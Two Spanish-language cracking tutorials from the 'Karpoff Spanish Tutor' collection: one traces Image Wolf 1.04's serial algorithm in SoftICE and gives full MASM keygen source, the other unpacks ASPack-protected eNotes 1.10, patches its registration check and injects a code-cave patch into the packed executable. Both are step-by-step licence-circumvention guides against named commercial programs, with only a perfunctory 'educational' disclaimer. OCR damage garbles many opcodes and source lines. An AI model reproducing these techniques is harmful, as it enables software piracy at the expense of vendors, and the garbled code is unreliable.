Creo que ya está bien por hoy. Hemos desempakado el programa, quitado las rutinas antidebugger, saltado el límite de 
tiempo, la comprobación de integridad, hemos logrado una presentación atractiva y como propina hemos habilitado la 
ventana que nos faltaba. 


Conclusión, salvo un par de menudencias como son quitar la nota de aviso en la ventana del Cache y habilitar la línea 
"** This is the LICENSED..." en el menú About, tenemos el programa completo, ¿Que más quieres?. 


Se me olvidaba, esto es con propositos educativos..., el autor no se hace responsable..., etc, etc... 


Saludos y hasta otra... 


Karpoff Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre 


Ingeniería Inversa y Programación. Email "Colabora con tus Proyectos" 


Programa: 


Karpoff Spanish Tutor 
Image Wolf 1.04 Build 005 


PROTECCION: Name / Serial. 

Objetivo: Hacer un Keygen. 

Descripcion: Parece que busca en la Red, archivos gráficos o de video. 
Dificultad: Aficionado 

DOWNLOAD : http://www.trellian.com/bin/iwolf104.exe 

Herramientas: Softice, Masm. 

CRACKER: CaoS ReptantE FECHA: 06/09/2001 


INTRODUCCION 


Bueno, ya estamos aquí de nuevo. Este será probablemente el último tuto de CaoS ReptantE sobre 
keygens, y aún es posible que después vuelva a las tinieblas de donde salió... Hoy nos enfrentamos a un 
programa que hubiera podido resultar muy complicado para encontrar el sistema de generación del serial, 
si no fuera por unos pocos fallos tontos del programador. Veremos como una buena idea, queda malograda 
por esos fallos. La buena idea consiste en que para obtener el serial se basa, además de en el nombre con el 
que queremos registrarnos, en los primeros caracteres del propio serial que introducimos. Esto significa 
que si esos caracteres no son los correctos, el número que encontraremos, y con el que trataremos de 
registrarnos, no servirá para nada. ¿Cuál es el fallo entonces? Que la comparación de esos caracteres se 
hace de una manera descarada y por si fuera poco, antes de generar el número, cuando sería mucho mejor 
hacerlo después de haber generado el número, y con un poco más de discreción. De manera que, aunque 
como de costumbre el código que genera el serial está metido entre toneladas de basura, hasta el más 
despistado se entera de que los tres primeros caracteres del serial son "IW-". 


AL ATAKE 


Una vez cargado el Softlce, ejecutaremos el programa y trataremos de registrarnos. Introduciremos nuestro nombre 
(en mi caso: "CaoS ReptantE”) y un número de registro chungo. Antes de darle a OK, hacemos ctrl-D para entrar en 
el Slce y establecemos un breakpoint: bpx getdlgitemtexta. F5 para continuar y OK. Salta el Slce, F5 nuevamente 
para que lea la segunda ventana de texto y F12 que nos lleva a: 


:0040BFF6 6A52 push 00000052 


Ahora buscaremos en la memoria nuestro serial chungo mediante la instrucción s 30:00 1 ffffffff 'serial_chungo' y la 
instrucción s para continuar buscando. Nos aparece el número en dos posiciones de la memoria. A continuación, 
introduciremos la instrucción bpr inicio_dirección_obtenida final_dirección_obtenida r para cada una de las 
direcciones halladas para pillar al programa cuando lee nuestro serial. Pulsamos F5 para continuar, e iremos 
alternando F10 para tracear con paciencia ya que el camino esta lleno de basura y F5, hasta llegar a: 


:0040CAE4 OFBEO2 movsxX eax, byte ptr [edx] 
:0040CAE7 83F849 cmp eax, 00000049 
:0040CAEA 7523 jne 0040CBOF 


Aquí vemos la comparación entre el primer carácter de nuestro serial chungo e "I". (49h) 


:0040CAEF OFBE5101 movsx edx, byte ptr [ecx+01] 
:0040CAF3 83FA57 cmp edx, 00000057 
:0040CAF6 7517 jne 0040CBOF 


Vemos ahora la comparación entre el segundo carácter y "W". (57h) 


:0040CAF8 6A2D push 0000002D 

:0040CAFA 8B450C mov eax, dword ptr [ebp+0C] 
:0040CAFD 50 push eax 

:0040CAFE E85D230100 call 0041EE60 


Como nos mosquea ver 2D (código de "-"), entramos en el call y vemos: 


:0041EE79 3807 cmp byte ptr [edi], al 
:0041EE7B 7404 je 0041EE81 


Comparación entre el tercer carácter y "-". ¿No os habíais dado cuenta de que se efectuaban esas comparaciones? No 
importa. El programador lo ha previsto y os da una segunda oportunidad ;-) 


:0040CD5C OFBEO8 mOvVsX ecx, byte ptr [eax] 
:0040CD5F 83F949 cmp ecx, 00000049 

:0040CD62 750€ jne 0040CD70 

:0040CD67 OFBE4201 movsX eax, byte ptr [edx+01] 
:0040CD6B 83F857 cmp eax, 00000057 

:0040CD6E 7407 je 0040CD77 


Aunque no lo indico, también vuelve a comprobar el guión, por si acaso :-D Le damos a F5 y continuamos: 


:0041EE0OB 8BO1 mov eax, dword ptr [ecx] 


Traceamos a partir de aquí y vemos que estamos en un bucle en el que se van moviendo cosas. Y una de las cosas 
que se mueven es nuestro serial chungo (en EDX), que se copia en otra dirección (EDI) 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0041EE1E(C), :0041EE38 (U) 


:0041EE01 8917 mov dword ptr [edil], edx 


Ahora ampliaremos nuestro campo de búsqueda mediante la instrucción bpr inicio_nueva_dirección 
final_nueva_dirección r. Continuamos con F5 y vemos que verifica de nuevo el guión y substituye su código ASCII 


(2D) por 00. Nuevamente F5 y caemos en: 


:0040CBC6 OFBE11 movsx edx, byte ptr [ecx] 
:0040CBC9 83FA52 cmp edx, 00000052 
:0040CBCC 7502 jne 0040CBDO 


Aquí comprueba si el primer carácter del serial es "R". Esta es una de las incógnitas que le quedan al programa, la 
otra es que genera otro serial correcto además del que vamos a encontrar. Si alguien quiere entretenerse, ya sabe 
como... :-) F5 una vez más y: 


:0040CBEE OFBE11 movsx edx, byte ptr [ecx] 
:0040CBF1 83C209 add edx, 00000009 


Toma el código ASCU del primer carácter de nuestro serial ("I" = 49h) y le suma 9 (52h) 
(A partir de aquí sólo voy a poner las instrucciones necesarias para entender la generación del serial, porque sino, 
esto se puede convertir en un galimatías) 


:0040CBF7 8A84057CFFFFFF mov al, byte ptr [ebp+eax-00000084] 


En esta posición de memoria, se han situado las cuatro primeras letras de nuestro nombre (en mi caso "CaoS"). 
Ahora tomamos el código de la primera de ellas ("C" = 43h). 


:0040CBFE F6EA imul dl 
:0040CC03 88840D7CFFFEEF mov byte ptr [ebp+ecx-00000084], al 


Ha multiplicado 43h por 52h (1576h) y ha puesto 76 en el lugar que ocupaba la "C". Este proceso se repite con los 
códigos de las otras tres letras y luego se vuelve a efectuar con el código del siguiente carácter del número ("W" = 
57h) al que se le suma 9 (60h) y se multiplica por los resultados obtenidos en el primer proceso: 


Ca o Ss 43 61 6F 53 

x 52h 76 52 8E 96 

x 60h 40 elo) 40 40 
:0040CC47 8B4508 mov eax, dword ptr [ebp+08] 
:0040CC4A 034588 add eax, dword ptr [ebp-78] 


En EAX tenemos la dirección de la cadena "CaoS ReptantE" 


:0040CC4D OFBEO8 mOVsX ecx, byte ptr [eax] 
:0040CC50 83C109 add ecx, 00000009 


Tenemos ECX = 4Ch ("C" = 43h, + 9 =4C) 


:0040CC56 8A84157CFFFFEFF mov al, byte ptr [ebp+edx-00000084] 
:0040CC5D 32C1 xor al, cl 
:0040CC62 88840D7CFFFEEF mov byte ptr [ebp+ecx-00000084], al 


Ha tomado el primero de los cuatro números obtenidos anteriormente (40) y lo ha "xoreado" con 4Ch, a continuación 
ha puesto el resultado (0C) en el lugar que ocupaba el número. Este proceso se repite, primero con los otros tres 
números y luego con cada letra de las que forman el nombre. 


40 [elo 40 40 
XOR 4Ch el 8c e e 


XOR 4Eh 74 F4 74 74 


:0040CC6D 8B957CFFFFFF mov edx, dword ptr [ebp+FEFFFFF7C] 
:0040CC73 8955FC mov dword ptr [ebp-04], edx 


Ha colocado el número obtenido en otro lugar. A continuación hace algunas comparaciones de las que tomaremos 
nota para hacer el keygen. 


:0040CC76 837DFCOO cmp dword ptr [ebp-04], 00000000 
:0040CC7A 7D08 Jjge 0040CC84 

:0040CC7C 8B45EFC mov eax, dword ptr [ebp-04] 
:0040CC7F F7D8 neg eax 

:0040CC81 8945EFC mov dword ptr [ebp-04], eax 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0040CC7A(C) 

:0040CC84 837DFCOO cmp dword ptr [ebp-04], 00000000 
:0040CC88 7507 jne 0040CCc91 

:0040CC8A C745FC01000000 mov [ebp-04], 00000001 


Si el número es igual a cero, lo hace igual a uno. 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0040CC88(C), :0040CCA3 (U) 


:0040CC91 817DFCO0OF270000 cmp dword ptr [ebp-04], 0000270F 
:0040CC98 7DO0B Jjge 0040CCA5 

:0040CC9A 8B4DEC mov ecx, dword ptr [ebp-04] 
:0040CC9D 6BCIOA imul ecx, 0000000A 

:0040CCAO0 894DFC mov dword ptr [ebp-04], ecx 
:0040CCA3 EBEC jmp 0040CC91 


Aquí tenemos otro fallo que nos ahorrará trabajo. Compara el número con 270Fh, que es igual a 9999, con lo que nos 
está diciendo que vamos bien y que deberemos pasar este número a decimal (a veces es conveniente, cuando aparece 
uno de esos números cabalísticos, buscar su equivalencia en decimal). Si es inferior, lo va multiplicando por diez 
hasta que es igual o mayor. Me parece que se ha equivocado, ha puesto jge, cuando tenía que haber puesto jg :-D 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
| :0040CC98(C), :0040CCBC (U) 


:0040CCA5 817DFC3F420F00 cmp dword ptr [ebp-04], 000F423F 
:0040CCAC 7E10 jle 0040CCBE 

:0040CCAE 8B45EFC mov eax, dword ptr [ebp-04] 
:0040CCB1 99 cda 

:0040CCB2 B90A000000 mov ecx, 0000000A 

:0040CCB7 F7F9 idiv ecx 

:0040CCB9 8945EFC mov dword ptr [ebp-04], eax 
:0040CCBC EBE7 jmp 0040CCA5 


Aquí compara el número con F423Fh (999999) y si es mayor, lo divide por diez. Aquí lo ha hecho bien :-) Ha 
dividido nuestro número (7474F474h) por Ah cuatro veces hasta conseguir el número 2FB36h que es igual a 195382. 
Así pues, ya hemos conseguido nuestro serial. 


Bien, ya tenemos todos los mimbres para hacer el cesto :-) y podemos hacer el keygen. Para ello echaremos mano, 
como en otras ocasiones, del Masm32. Necesitaremos crear dos archivos: el de recursos rsrc.rc y el del código, al 
que llamaremos por ejemplo /Wolf.asm. Del primero no voy a comentar nada, pues es prácticamente igual al de otros 
keygens que hemos hecho, como por ejemplo el del Power Archiver; y del segundo sólo comentaré el procedimiento 
operacion que es donde generaremos el serial, porque la parte restante también la hemos visto en tutos anteriores. 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32XincludeYwindows.inc 
include c:imasm32lincludeluser32.inc 


include c:imasm32XincludeXkernel32.inc 
includelib c:imasm321libluser32.1lib 
includelib c:imasm3211liblkernel32.1lib 


.const 

IDD_DIALOG EQU 1000 

IDC_NAME EQU 1001 

IDC_SERIAL EQU 1002 

IDC_GEN EQU 1003 

IDC_EXIT EQU 1004 

DlgFunc PROTO :DWORD, :DWORD, :DWORD, : DWORD 


Operacion PROTO 


.data 


nombre db 64 dup(0),0 

numero db 4 dup(0),0 

serial db 9 dup(0),0 

nada db 20 dup(0),0 

Icono db "keygen",0 

Iconimage db "keygen",0 
minombre db "CaoS ReptantE",0 
menosde4 db "¡Mínimo 4 caracteres!",0 
hInstance dd 0 

hIcon dd 0 

hWnd da 0 


. code 


starts 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG,NULL,addr DlgFunc, NULL 
invoke ExitProcess,NULL 


DlgFunc proc hD1g:DWORD, uUMsg:DWORD, wParam:DWORD, 1lParam: DWORD 


.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,addr Icono 
mov hlIcon,eax 
invoke SendMessage, hDlg, WM_SETICON,1,hIcon 
invoke SetDlglItemText,hDlg,IDC_NAME,ADDR minombre 
.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 
.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 
.1f dx==BN_CLICKED 
.1f ax==IDC_EXIT 
invoke SendMessage,hDlg,WM_CLOSE, 0,0 
.elseif ax==IDC_GEN 
invoke GetDlglItemText,hDlg,IDC_NAME,ADDR nombre, 80 
invoke l1lstrlen,ADDR nombre 
invoke Operacion 
.1f eax== 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nada 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR menosde4 
.else 
invoke SetDlgltemText,hDlg,IDC_SERIAL,ADDR serial 
invoke SetDlgltemText,hDlg,IDC_NAME,ADDR nombre 


.endif 
ret 
.endif 
.endif 
.endif 
ret 
DlgFunc endp 


Operacion proc 


.1f eax < 4 
mov eax,1l 
ret 

.endif 

pushad 


Comprobamos que el nombre no tiene menos de cuatro letras y guardamos los registros, por lo que pueda ser... 


mov ebx, offset nombre 
mov ecx, offset numero 
xXor eax, eax 
buclel: mov dl, byte ptr [ebx+eax]l 
mov byte ptr [ecx+eax], dl 
inc eax 
«if al < 4 
jmp buclel 
.endif 


Tomamos los códigos ASCII de las cuatro primeras letras del nombre y los ponemos en numero. 


push ecx 
bucle2: mov eax, 52h 
mov dl, byte ptr [ecx] 
.1f dl== 
jmp seguirl 
.endif 
imul dl 
mov byte ptr [ecx], al 
inc ecx 
jmp bucle2 


Después de guardar la dirección de numero, multiplicamos los cuatro números que teníamos por 52h (código de "I" = 
49, más 9) 


seguirl: pop ecx 
push ecx 
bucle3: mov eax, 60h 
mov dl, byte ptr [ecx] 


jmp seguir2 
.endif 
imul dl 
mov byte ptr [ecx], al 
inc ecx 
jmp bucle3 


Recuperamos la dirección de numero, la volvemos a guardar y multiplicamos los cuatro números por 60h (código de 
"W" =57, más 9) 


seguir2: pop ecx 
push ecx 

bucle!4: mov al, byte ptr [ebx] 
.1f al== 


jmp seguir3 
.endif 


add al, 9 
xor esi, esi 
buclela: mov dl, byte ptr [ecx+esi] 
xor dl, al 
mov byte ptr [ecx+esil, dl 
inc esi 
.1f esi < 4 
jmp buclela 
.endif 
inc ebx 
jmp bucle4 


Ahora hemos "xoreado" los cuatro números con cada uno de los códigos de las letras de nuestro nombre. 


seguir3: pop ecx 
mov edi, dword ptr [ecx] 
cmp edi, O 
jge saltol 
neg edi 
cmp edi, O 
saltol: jnz menor 
mov edi, 1 


Si el número es negativo lo vuelve positivo, y si es cero lo iguala a uno. Ahora tenemos nuestro serial en EDI. 


menor: .1f edi < 270Fh 
mov eax, 10 
xor edx, edx; 
imul edi 
mov edi, eax 
mov dword ptr [ecx], edi 
jmp menor 
.endif 


Si el número es menor que 9999 (270Fh), lo multiplicamos por 10. (tendría que ser menor o igual) 


mayor: .1f edi > 0F423Fh 
push ecx 
mov ecx, 10 
xor edx, edx 
mov eax, edi 
idiv ecx 
pop ecx 
mov edi, eax 
jmp mayor 

.endif 


Si el número es mayor de 999999 (F423Fh), lo dividimos por 10. 


mov esi, offset serial 
mov byte ptr [esil, 49h 
inc esi 

mov byte ptr [esil, 57h 
inc esi 

mov byte ptr [esil, 2Dh 


Ahora en el campo serial, hemos puesto los códigos ASCII de "IW-". Vamos a pasar el número hexadecimal 
obtenido, a decimal. Esto se hace dividiendo el número hexadecimal por 10 y poniendo el resto de la división en el 
lugar de las unidades, luego se divide el cociente por 10 y el resto se pone en el lugar de las decenas y se continua así 
hasta que el cociente es menor de 10 y se coloca como cifra más significativa del serial. 

Si el número obtenido es igual a 9999, le sumaremos 4 a ESI para que apunte a las unidades; si es menor de 100000 
(186A0h) le sumaremos 5, y si es igual o mayor le sumaremos 6. 


«if edi == 270Fh 


add esi, 4 
jmp seguir4 
.endif 
.1¡f edi < 186A0h 
add esi, 5 
.else 
add esi, 6 
.endif 


seguir4: mov eax, edi 
mov ecx, 10 
otro: cmp eaX, ecx 
jb fin 
xor edx, edx 
idiv ecx 
add dl, 30h 
mov byte ptr [esil, dl 
dec esi 
jmp otro 
fins add al, 30h 
mov byte ptr [esil, al 


Ya tenemos el serial del tipo IW-nnnnm, yo no he conseguido ningún número de cuatro o cinco cifras, pero por lo 
visto, la posibilidad existe. Ahora, recuperaremos los registros y regresamos. 


popad 
ret 
Operacion endp 


end start 


Misión cumplida :-) He aquí el resultado. 


Nombre] — CaoSReptante 
serial IES 
Terminar | 


Os recuerdo una vez más que debéis pagar los programas que utilicéis regularmente y que estos tutos deben servir 
solamente para aprender. Luego no le digáis al juez: "Yo no quería, pero CaoS ReptantE me incitó a delinquir..." ;-) 


Por último quiero saludar a mis buenos amigos Act MagO y PrfESOr X. También a Karpoff, Silver Storm, 
KuaTo_ThoR, vLuGo, ByTESCRK y last but not least: DeK_OIiN. 


Si queréis alguna aclaración sobre mis tutos, mi dirección de e-mail es: caos_reptante O hotmail.com 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 


Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 1999-2001 


Programa: eNotes 1.10 Build 1.1.6.160 


PROTECCION: Serial distinto en cada instalación. 

Objetivo: Simular estar registrados. 

Descripcion: Permite escribir notas y pegarlas en el escritorio. 

Dificultad: Aficionado. 

DOWNLOAD: http://wwwW.simtel.net/pub/simtelnet/win95/desktop/enotes11.zip 

Herramientas: Softice, W32dasm, file insPEctor, ProcDump, UltraEdit. 

CRACKER: CaoS ReptantE FECHA: 10/09/2001 
INTRODUCCION 


La verdad, cuando empecé a trabajar este programa lo hice pensando en otro tema del que quizá algún día 
hablaremos, y no tenía intención de escribir un tuto sobre él, pero según lo iba viendo, me daba cuenta de 
que era un perfecto cobaya, porque tiene una serie de características que hacen que su estudio resulte 


instructiv 
esfuerzos 


O. La verdad es que resulta dudoso que la utilidad del programa por sí sola, justifique los 
que vamos a realizar, pero lo cierto es que estamos en esto para aprender, no para disfrutar de 


programas de calidad dudosa sin pagar un céntimo ;-) 


AL ATAKE 


Empezamos -como siempre- con el Softlce cargado y ejecutamos el programa, que se va de cabeza a la barra de 


tareas. Vamos allí y le damos al botón derecho del ratón y vamos a Help/Register. Allí aparece una ventana en la que 
nos piden nada menos que 25 $ por registrarnos y aparece también un código llamado Serial ID y debajo el recuadro 
para introducir nuestro serial. Este Serial ID podemos comprobar que varía en cada instalación, con lo cual también 
variará el serial que deberíamos introducir para registrarnos. No nos preocupemos por eso de momento. Introducimos 
nuestro serial chungo, ctrl+D para entrar en el Slce, introducimos nuestro breakpoint favorito: bpx hmemcpy, F5 
para salir de Slce y OK para registrarnos. Salta el Slce, le damos varias veces a F12 hasta que regresamos al 
programa en: 


:0042C63A 5] 


El 


pop esi 


Ahora se trata de buscar mediante la instrucción s 30:00 1 ff£fffff 'serial_chungo' la posición o posiciones que ocupa 
en la memoria el número introducido. A continuación, empleando las instrucciones bpm dirección _obtenida r o 
bpr inicio_dirección obtenida final_dirección obtenida r sabremos cuando el programa lee este número para 


compararlo con el correcto. Una vez hecho esto, le damos a F5 y nos detenemos en varios lugares que no nos llaman 
la atención, pero de pronto... 


:00403F31 8BOE mov ecx, dword ptr [esi] 
:00403F33 8B1F mov ebx, dword ptr [edi] 
:00403F35 39D9 cmp ecx, ebx 
:00403F37 7558 jne 00403F91 


¡BIEN! ¡Lo tenemos! En EST tenemos la dirección de nuestro serial chungo y en EDI la del serial verdadero. Así 
pues, ya podemos registrarnos. Pero... un momento, ¿no habíamos quedado en que el serial sería distinto a cada 
instalación? Así, este serial sólo nos sirve a nosotros. ¡No pasa nada! parchearemos el salto. Pero... ¡ay! que poco 
dura la alegría en la casa del pobre :-( Como ya he dicho, estaba yo investigando otra cosa y en vez de parchear el 
salto, puse un bpx en 403F31, y me lleve la desagradable sorpresa de ver que el programa se detenía varias veces en 
este punto comparando cadenas de texto que unas veces eran iguales y otras no. Así que hay que olvidarse de 
parchear el salto. Está claro que después de esta comparación debe haber otra que nos lleve al éxito o al fracaso. Pero 
esto debemos verlo en el listado muerto del W32dsam. Antes, vamos a ver que nos dice el file insPEctor...¡ Arghhh! 
empaquetado con Aspack v1.08.04. Bueeeeeeno, vamos a desempacarlo. Ejecutamos el Symbol Loader para tracear 
con el Slce desde el inicio del programa, cargamos el módulo del programa, le damos a las ruedecitas, le decimos 
que sí al mensaje de error y... nos encontramos que el programa, sin detenerse para nada, se ha ido a la barra de 
tareas. Que no cunda el pánico, cerramos el programa, vamos al ProcDump y en PE Editor seleccionamos nuestro 
programa, después en Sections, nos ponemos sobre la primera (CODE) y le damos al botón derecho del ratón, 
escogemos Edit Section y vemos que en Section characteristics tenemos el valor CODO0040, que cambiamos por 
E0000020. OK y a la calle. 


No tengo muchas ganas de explicar la razón de esto y citaré a nuMIT_or (Descabezando archivos ejecutables 
portables): 


El campo Characteristics indica las propiedades de la sección, es decir, si se trata de código objeto, de datos 
inicializados o no inicializados, si se puede escribir y leer sobre la sección, si es ejecutable, si es compartible, etc. 
PROCDUMP llama a este campo "CHARACTERISTICS". A continuación las equivalencias: 


000000020h _ Código. 

000000040h __ Datos inicializados. 

000000080h __Datos no inicializados. 

040000000h __ Sección cacheable. 

080000000h __Sección paginable. 

100000000h __Sección compartida. 

200000000h _ Ejecutable. 

400000000h __Se puede leer. 

800000000h __Se puede escribir en la sección. 
Esto quiere decir que teníamos una sección en la que se podía leer y escribir y tenía datos inicializados. Ahora 
tenemos una sección en la que además de poderse leer y escribir, es ejecutable y contiene código. Repetimos el 
intento de tracear el programa desde el inicio y ahora sí, el Slce se detiene en: 


:004D4001 60 pushad 
:004D4002 E870050000 call 004D4577 


A partir de aquí se trata de tracear con F10 y sobre todo con mucha paciencia. Nos encontraremos con un montón de 
bucles con una estructura similar a esta: 


Inicio del bucle. 
Instrucciones 


Salto condicional a siguiente. 
Más instrucciones 


Salto incondicional al inicio del bucle. 


siguiente. 


El salto al inicio del bucle se reconoce fácilmente porque es un salto hacia atrás. Para ahorrar tiempo y energías, es 
recomendable ir directamente a la instrucción siguiente mediante un doble click con el ratón o con bpx siguiente o g 
siguiente. 

Finalmente, nuestros esfuerzos se ven recompensados y llegamos al final del proceso: 


:004D44F1 61 popad 

:004D44F2 7508 jne 004D44FC 
:004D44F4 B801000000 mov eax, 00000001 
:004D44F9 C20C00 ret 000€ 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004D44F2 (C) 

:004D44FC 6848AE4900 push 0049AE48 
:004D4501 C3 ret 


¿Y ahora que hacemos? Cuando estemos situados sobre la instrucción PUSH 0049AE48, introducimos la instrucción 
a eip y seguidamente, tras la dirección de la instrucción, jmp eip. Otra vez RETURN para dejar el ensamblado 
(veréis que el código 6848AE4900 (PUSH 0049AE48) ha sido substituido por EBFE (JMP 4D44FC)) y F5 para que el 
programa se siga ejecutando. Al seguir ejecutándose, lo que hace es entrar en un bucle infinito, lo cual 
aprovecharemos para ejecutar el ProcDump, buscar en Task el programa que hemos dejado ejecutándose, y tras 
clickear encima con el botón derecho del ratón, elegiremos la opción Dump (Full). Le damos el nombre que nos 
parezca para diferenciarlo del empacado (por ejemplo eDump.exe) y repetimos este último proceso, pero eligiendo la 
opción Kill task para terminar la ejecución del programa y del interminable bucle. 

Ahora tenemos un ejecutable desempaquetado, lo ejecutamos y: "Este programa ha efectuado una operación no 
admitida y...” ¿Y ahora que pasa? Que tendremos que dejar como estaba la instrucción que hemos modificado. 
Vamos a echar mano de un editor hexadecimal y buscaremos "EBFEAE4900" que es lo que ha quedado al 
superponer a la instrucción PUSH que teníamos, la instrucción JMP. Lo encontramos sin problemas y substituimos 
"EBFE" por "6848" con lo que volvemos a tener la instrucción original. Volvemos a ejecutar eDump.exe y 
FUNCIONA :-) 

Ahora por fin, podemos desensamblar el programa con el W32Dsam y lo primero que haremos es buscar entre las 
String Data References alguna referencia a password incorrecto o algo parecido. Encontramos lo que buscábamos y 
ello nos conduce a esta parte del programa: 


:0048D415 EBSEEGAF7FE call 00403F08 

:0048D41A 7527 jne 0048D443 

:0048D41C A160C64900 mov eax, dword ptr [0049C660] 
:0048D421 8B00 mov eax, dword ptr [eax] 
:0048D423 8B4030 mov eax, dword ptr [eax+30] 
:0048D426 8B55EC mov edx, dword ptr [ebp-04] 
:0048D429 EB8BAD6FEFE call 0047AAE8 

:0048D42E 668B0D84D44800 MOV CX, word ptr [0048D484] 
:0048D435 B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"Thank you for registering eNotes!" 


:0048D437 B890D44800 mov eax, 0048D490 
:0048D43C E833F1FFEF call 0048C574 
:0048D441 EB13 jmp 0048D456 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0048D41A(C) 
:0048D443 668B0D84D44800 MOV CX, word ptr [0048D484] 
:0048D44A B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"Registration password is invalid!" 


:0048D44C B8BCD44800 mov eax, 0048D4BC 
:0048D451 ES1EF1FFEFE call 0048C574 


Si miramos esto con una mínima atención, veremos que la diferencia entre "chico bueno" y "chico malo" está en: 


0048D41A 7527 jne 0048D443 ¿Qué os parece si hacemos que nunca salte? para ello podemos substituir 7527 
por 9090 o si somos perfeccionistas, por 7500. Pues venga, tomamos nota del offset correspondiente a 48D41A, que 
es 8CALA y volvemos al editor. Ya estamos de vuelta. Naturalmente hemos elegido la opción de substituir 27 por 
00. Y ahora ejecutamos el programa de nuevo. Introducimos nuestros datos, aparentemente los acepta. Reiniciamos 
el programa y... ESTAMOS REGISTRADOS. Pues ya está ya hemos terminado. Pero un momento, supongamos que 
queremos pasarle el parche a un colega para que pueda evaluar el programa con toda tranquilidad ;-) ¿Le vamos a dar 
un ejecutable de 800 KB? A estas alturas, debemos ser capaces de algo mejor. Vamos a ver que podemos hacer... 


Lo ideal sería parchear el ejecutable empaquetado para que cuando se efectúa el salto desde la rutina de desempacado 
al programa propiamente dicho, no fuera a la dirección de inicio del programa sino a un trocito de código y de allí al 
inicio del programa. Vamos a desensamblar el programa empacado. Lo desensamblamos con el W32Dsam pero el 
código desensamblado sólo llega a la posición 43B9FF. Por lo tanto, no aparecen las instrucciones que buscamos, 
que están a partir de 4D44F1. Hummm... eso debe estar en la sección .aspack. Vamos a probar de cambiar sus 
características igual que hicimos con la sección CODE. Lo hacemos, y de nuevo en el desensamblador tenemos a la 
vista el código que necesitamos: 


:004D44F1 61 popad 

:004D44F2 7508 jne 004D44FC 
:004D44F4 B801000000 mov eax, 00000001 
:004D44F9 C20C00 ret 000€ 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :004D44F2 (C) 

:004D44FC 6800000000 push 00000000 
:004D4501 C3 ret 


Bueno, esto es casi igual que antes, pero algo falla: el parámetro de la instrucción PUSH que antes era la dirección de 
inicio del programa desempacado, ahora es O. Por si alguien se ha perdido, os recuerdo que lo que hemos visto antes 
era esta zona justo cuando había terminado el desempacado del programa y lo que vemos ahora es el listado muerto o 
desensamblado del programa antes de ejecutarse. Lo que está claro, es que en algún momento del desempacado, se 
ponen en la dirección 4D44FD los cuatro bytes que definen la dirección del inicio del programa y que son los que 
queremos cambiar para dirigirnos al lugar donde pondremos nuestro código. Volvemos al Symbol Loader y 
ejecutamos de nuevo el programa empaquetado. Cuando el Slce se detiene al principio de la ejecución, introducimos: 
bpm 4d44fd y le damos a F5. Se detiene el Softlce y vemos que los cuatro bytes que buscamos se ponen en la 
instrucción anterior al POPAD y que proceden de EAX. 


:004D44DB 8B856A3A4400 mov eax, dword ptr [ebp+00443A6A] 
:004D44E1 50 push eax 

:004D44E2 0385F8474400 add eax, dword ptr [ebp+004447F8] 
:004D44E8 59 pop ecx 

:004D44E9 OBC9 Or ecx, ecx 

:004D44EB 8985953E4400 mov dword ptr [ebp+00443E95], eax 


Si miramos las instrucciones anteriores, veremos que hay que poner un bpx 4d44db y volver a empezar para ver 
donde podemos meter la zarpa :-) Se detiene de nuevo el SlIce, podemos ver en la parte superior izquierda, que la 
dirección EBP + 443A6A corresponde a 4D40D2 y que el valor que hay en ella es 48AE09, por lo que en EAX se 
coloca el valor 0O009A FAS a lo que se suma 00400000. Podemos comprobar que el valor 48AE009 está en esta 
dirección mirando el listado muerto del programa empaquetado W32dsam: 


:004D40D1 0048AE add byte ptr [eax-52], cl 
:004D40D4 0900 or dword ptr [eax], eax 


Fijaos como el pobrecillo ha tratado de desensamblarlo como parte del código. 
Por ahora ya sabemos que podemos cambiar la dirección del salto hacia nuestro código, ahora vamos a buscar un 
lugar para éste. Un poco más abajo de este punto, encontramos lo siguiente: 


:004D41B2 00000000000000000000 BYTE 10 DUP (0) 
:004D41BC 00000000000000000000 BYTE 10 DUP (0) 


Parece que este lugar es ideal para nosotros. Una manera de confirmarlo es escribir algo de texto en él, ejecutar el 
programa y durante la ejecución, mirar si el texto existe y está entero. En nuestro caso no hay problema. Si hubiera 
problemas, lo mejor es usar los ceros que hay siempre en el final de alguna sección. Así pues está decidido que 
nuestro código va a ir en la dirección 4D41B2. Entonces ¿qué vamos a poner en la posición 4D40D2 en lugar de 
48AE09? Debemos poner B2410D. Buscamos en el editor hexa la cadena "0048AE0900" que tenemos arriba y una 
vez hallada, substituimos 48AE09 por B2410D. ¿Funcionará? 

Vamos a comprobarlo. Una vez más, ejecutamos el programa desde el Symbol Loader y ponemos un bpx 4d44db. 
Se detiene el Slce y BINGO se coloca la dirección correcta, traceamos con F10 y ahora que va a saltar a la zona de 
ceros es el momento de ensamblar nuestro código. Al llegar a la dirección 4D41B2, tecleamos a eip y a continuación 
vamos introduciendo instrucciones: push eax / xor eax, eax / mov byte ptr [48d41b], al / jmp 49ae48 / pop eax y 
finalmente ret. Ahora debemos tomar nota de los códigos generados para introducirlos posteriormente con el editor. 
Estos códigos son: 


50 33 CO A2 1B D4 48 00 58 E9 88 €C FC FF C3 


Los introduciremos en el programa empacado mediante el editor hexadecimal, en el offset correspondiente a la 
dirección 4D41B2 que podemos calcular o ver en el W32dsam. El resultado es: 449B2. Una vez entrados los datos 
en el programa, nuestro código queda así: 


:004D41B2 50 push eax 

:004D41B3 33C0 xor eax, eax 

:004D41B5 A21BD44800 mov byte ptr [0048D41B], al 
:004D41BA 58 pop eax 

:004D41BB E9886CFCFF jmp 0049AE48 

